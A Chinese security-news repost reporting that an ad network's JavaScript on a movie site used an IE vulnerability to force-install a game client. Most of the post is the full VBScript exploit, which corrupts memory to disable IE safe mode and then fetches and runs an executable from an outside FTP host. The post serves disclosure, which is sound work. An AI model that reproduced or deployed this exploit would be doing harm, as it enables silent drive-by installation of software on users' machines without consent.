记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

2529网盟利用最新ie漏洞强制安装光芒微端

2015-01-02 04:20

我在用百度浏览器的ie兼容模式浏览 http://www.dy2018.com 这个电影网站时,发现莫名其妙运行了一个叫“光芒微端”的游戏客户端,然后我就用smartsniff抓包分析,在查看源代码时发现了2529网盟的js广告代码,里面就是最新公布的18年陈酿的ie漏洞!引用这个js就会从它的ftp上下载kuaidu_2_23_01.exe并运行!

访问http://www.2529.com/page/ms.js就可以看到这个js代码了,用ie访问www.dy2018.com或者直接引用这个js都会自动在电脑上安装光芒微端
 


function runmumaa()
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")

objWsh.run "cmd.exe /c del /F %temp%\ftp.txt & echo open 218.2.22.173>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo user>>%temp%\ftp.txt&echo anonymous>>%temp%\ftp.txt&echo testpass>>%temp%\ftp.txt&echo get kuaidu_2_23_01.exe>>%temp%\ftp.txt & echo bye>>%temp%\ftp.txt ",0,true

objWsh.run "cmd.exe /c cd %temp% & ftp -s:""%temp%\ftp.txt""",0,true

wscript.sleep 1000

objWsh.run """%temp%\kuaidu_2_23_01.exe""",0,true

document.write(Err.Description)
end function

dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0) then
exit function
end if

if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function


function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)
end function

 

解决方案:

加强过滤

知识来源: www.2cto.com/Article/201501/365759.html

阅读:72649 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“2529网盟利用最新ie漏洞强制安装光芒微端”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云